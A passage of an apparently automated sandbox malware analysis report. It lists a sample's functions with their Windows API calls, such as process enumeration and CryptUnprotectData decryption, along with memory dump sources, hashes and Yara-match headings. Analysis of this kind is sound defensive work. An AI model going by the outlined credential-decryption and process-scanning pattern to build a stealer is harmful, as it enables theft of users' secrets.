                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                • String ID:
                                • API String ID: 2609814428-0
                                • Opcode ID: 29b8e59697f6078ec76b53ab7a5113d5a183bbbbec22379607d4f75b77f4293e
                                • Instruction ID: cfb149b92c60783cd0c70999ba8eb0f11fbe953442c0cfb8957c3e652cf86f71
                                • Opcode Fuzzy Hash: 29b8e59697f6078ec76b53ab7a5113d5a183bbbbec22379607d4f75b77f4293e
                                • Instruction Fuzzy Hash: A5011E75B41318BBEB10DB94DC4AFAA7B79FB44B11F104159FA09EB2C0DAB0AD00CB90
                                Function 006C3A50 Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 006C71E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 006C71FE
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 006C3A96
                                • Process32First.KERNEL32(00000000,00000128), ref: 006C3AA9
                                • Process32Next.KERNEL32(00000000,00000128), ref: 006C3ABF
                                  • Part of subcall function 006C7310: lstrlen.KERNEL32(------,006A5BEB), ref: 006C731B
                                  • Part of subcall function 006C7310: lstrcpy.KERNEL32(00000000), ref: 006C733F
                                  • Part of subcall function 006C7310: lstrcat.KERNEL32(?,------), ref: 006C7349
                                  • Part of subcall function 006C7280: lstrcpy.KERNEL32(00000000), ref: 006C72AE
                                • CloseHandle.KERNEL32(00000000), ref: 006C3BF7
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                • String ID:
                                • API String ID: 1066202413-0
                                • Opcode ID: d1e9758fed086ac37db20d293655d3f918ab045ce686965728eed221303d2b61
                                • Instruction ID: a8d3d4c595c0548915aad927858aeffd01e5a0330ea566026823074874b3f7c6
                                • Opcode Fuzzy Hash: d1e9758fed086ac37db20d293655d3f918ab045ce686965728eed221303d2b61
                                • Instruction Fuzzy Hash: A881E730905225CFCB14DF19D948BA5B7B2FB54319F29C1AED4089B3A2D7769D82CF84
                                Function 006AEA30 Relevance: 6.1, APIs: 4, Instructions: 98stringencryptionCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlen.KERNEL32(?,00000001,?,?,00000000,00000000), ref: 006AEA76
                                • CryptStringToBinaryA.CRYPT32(?,00000000,?,00000001,?,?,00000000), ref: 006AEA7E
                                • lstrcat.KERNEL32(006CCFEC,006CCFEC), ref: 006AEB27
                                • lstrcat.KERNEL32(006CCFEC,006CCFEC), ref: 006AEB49
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$BinaryCryptStringlstrlen
                                • String ID:
                                • API String ID: 189259977-0
                                • Opcode ID: d9a29e1aac5ab4d12505670d6e92db7df2bce6c18a1040981ef58a9a2439f24a
                                • Instruction ID: 0416e62227cd2023cfe8bda5e4545c729d1cc97300ae4be66bd46195a39955db
                                • Opcode Fuzzy Hash: d9a29e1aac5ab4d12505670d6e92db7df2bce6c18a1040981ef58a9a2439f24a
                                • Instruction Fuzzy Hash: DF31A475A01119ABDB109B98EC49FEEB76AEF44715F04426EFA09E3240DBB15A048BA1
                                Function 006C40B0 Relevance: 6.0, APIs: 4, Instructions: 50memoryencryptionCOMMON
                                Download Yara Rule
                                APIs
                                • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,?,?,?,?), ref: 006C40CD
                                • GetProcessHeap.KERNEL32(00000000,?,?,?), ref: 006C40DC
                                • RtlAllocateHeap.NTDLL(00000000), ref: 006C40E3
                                • CryptBinaryToStringA.CRYPT32(?,?,40000001,?,?,?,?,?,?), ref: 006C4113
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: BinaryCryptHeapString$AllocateProcess
                                • String ID:
                                • API String ID: 3825993179-0
                                • Opcode ID: 072ab49df06bbad7a4e5e5c4eeb668168f6171d04675ca445a2f1a0db31d9b7c
                                • Instruction ID: 059eb1bea2a73909e93b69a36a75adafe7fbe4e2498c8acb65afe12a5f6acf45
                                • Opcode Fuzzy Hash: 072ab49df06bbad7a4e5e5c4eeb668168f6171d04675ca445a2f1a0db31d9b7c
                                • Instruction Fuzzy Hash: 1B011A70601205BBDB10DFA5EC99FAABBAEEF85311F108159FE4987340DE719D40CBA4
                                Function 006C2B60 Relevance: 6.0, APIs: 4, Instructions: 48memorytimeCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?,?,00000000,006CA3D0,000000FF), ref: 006C2B8F
                                • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 006C2B96
                                • GetLocalTime.KERNEL32(?,?,00000000,006CA3D0,000000FF), ref: 006C2BA2
                                • wsprintfA.USER32 ref: 006C2BCE
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateLocalProcessTimewsprintf
                                • String ID:
                                • API String ID: 377395780-0
                                • Opcode ID: f8a9d2336e8bb39fb2220704e550646bbe8a97dafa5d865ed7273b95ffe977f2
                                • Instruction ID: 88670f6b2ae138d86e564cfa61662af29f908d219c80d992726267361b97820e
                                • Opcode Fuzzy Hash: f8a9d2336e8bb39fb2220704e550646bbe8a97dafa5d865ed7273b95ffe977f2
                                • Instruction Fuzzy Hash: 860140B2905528EBCB149BC9ED45FBEB7BCFB4CB11F00021AF645A2280E7785840C7B1
                                Function 006A9B20 Relevance: 6.0, APIs: 4, Instructions: 42encryptionmemoryCOMMON
                                Download Yara Rule
                                APIs
                                • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 006A9B3B
                                • LocalAlloc.KERNEL32(00000040,00000000), ref: 006A9B4A
                                • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 006A9B61
                                • LocalFree.KERNEL32 ref: 006A9B70
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: BinaryCryptLocalString$AllocFree
                                • String ID:
                                • API String ID: 4291131564-0
                                • Opcode ID: a8dac18e88c80ba822c575a00ba3c2b3c1147888385ddb0504303775c0ee97de
                                • Instruction ID: b72fc28437860453d3401662f4f538eafe0632066bbe2b5716893a3cccc0d11c
                                • Opcode Fuzzy Hash: a8dac18e88c80ba822c575a00ba3c2b3c1147888385ddb0504303775c0ee97de
                                • Instruction Fuzzy Hash: B7F01D703427126BE7305F64AC49F977BA8EF05B50F200115FA49EA2D0D7B49C40CAA4
                                Function 00A5AD23 Relevance: 5.3, Strings: 3, Instructions: 1599COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 3Y,@$c;z$ht?
                                • API String ID: 0-2531942585
                                • Opcode ID: 082a0de82472baca61be7d86770589d31f9f7a44118e7601143bbf725a75bd68
                                • Instruction ID: ab18208420d802afea09115fa324de6ea956eaa62dc048c0bed394df00180d14
                                • Opcode Fuzzy Hash: 082a0de82472baca61be7d86770589d31f9f7a44118e7601143bbf725a75bd68
                                • Instruction Fuzzy Hash: FCB2C4F360C600AFE304AE29DC8567AFBE9EF94720F1A493DE6C4C3744E63598458697
                                Function 00A6515F Relevance: 5.0, Strings: 3, Instructions: 1200COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: P2So$TT_z$iA{
                                • API String ID: 0-1724300118
                                • Opcode ID: 0aaf91aae0cea0d161767feefb0e607e47afc52e6f4bbf79e3f593739fbe7992
                                • Instruction ID: 0705096c9c493592a50bbba1d30b0fac33f8350298c66b73b1840e230ab094d7
                                • Opcode Fuzzy Hash: 0aaf91aae0cea0d161767feefb0e607e47afc52e6f4bbf79e3f593739fbe7992
                                • Instruction Fuzzy Hash: 718208F390C214AFE3046E2DEC8577ABBE9EF94720F1A492DEAC4D3744E63558048796
                                Function 006BCAE0 Relevance: 4.6, APIs: 3, Instructions: 89comstringCOMMON
                                Download Yara Rule
                                APIs
                                • CoCreateInstance.COMBASE(006CB110,00000000,00000001,006CB100,?), ref: 006BCB06
                                • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 006BCB46
                                • lstrcpyn.KERNEL32(?,?,00000104), ref: 006BCBC9
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ByteCharCreateInstanceMultiWidelstrcpyn
                                • String ID:
                                • API String ID: 1940255200-0
                                • Opcode ID: 27997c129cb06c2c916f3905299596b3e6a367cc2e67543a95cfec5a8833ace1
                                • Instruction ID: ca1d76df365c32f8e94ef3de9bdafb858a48e403d1a51fcacadab826cb28e1b1
                                • Opcode Fuzzy Hash: 27997c129cb06c2c916f3905299596b3e6a367cc2e67543a95cfec5a8833ace1
                                • Instruction Fuzzy Hash: 90311271A40615AFD710DB94CC96FAEB7B9EB88B10F104294FA14EB2D0D7B1AE45CB90
                                Function 006A9B80 Relevance: 4.5, APIs: 3, Instructions: 44memoryencryptionCOMMON
                                Download Yara Rule
                                APIs
                                • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 006A9B9F
                                • LocalAlloc.KERNEL32(00000040,?), ref: 006A9BB3
                                • LocalFree.KERNEL32(?), ref: 006A9BD7
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Local$AllocCryptDataFreeUnprotect
                                • String ID:
                                • API String ID: 2068576380-0
                                • Opcode ID: 7b17965fae0404653c7b6ab0bfc3371218584c013ff3034d08fabdc940702857
                                • Instruction ID: 71f9790a373dc4b8c772b22bf9600403f5a3ecd5fbcdc182ecec020d01c885a4
                                • Opcode Fuzzy Hash: 7b17965fae0404653c7b6ab0bfc3371218584c013ff3034d08fabdc940702857
                                • Instruction Fuzzy Hash: 96011275A4120AABD710DBA4DC55FAFB779EB44700F104655EA04AB384DBB09D00CBE0
                                Function 00A6178F Relevance: 4.1, Strings: 2, Instructions: 1610COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmpDownload File
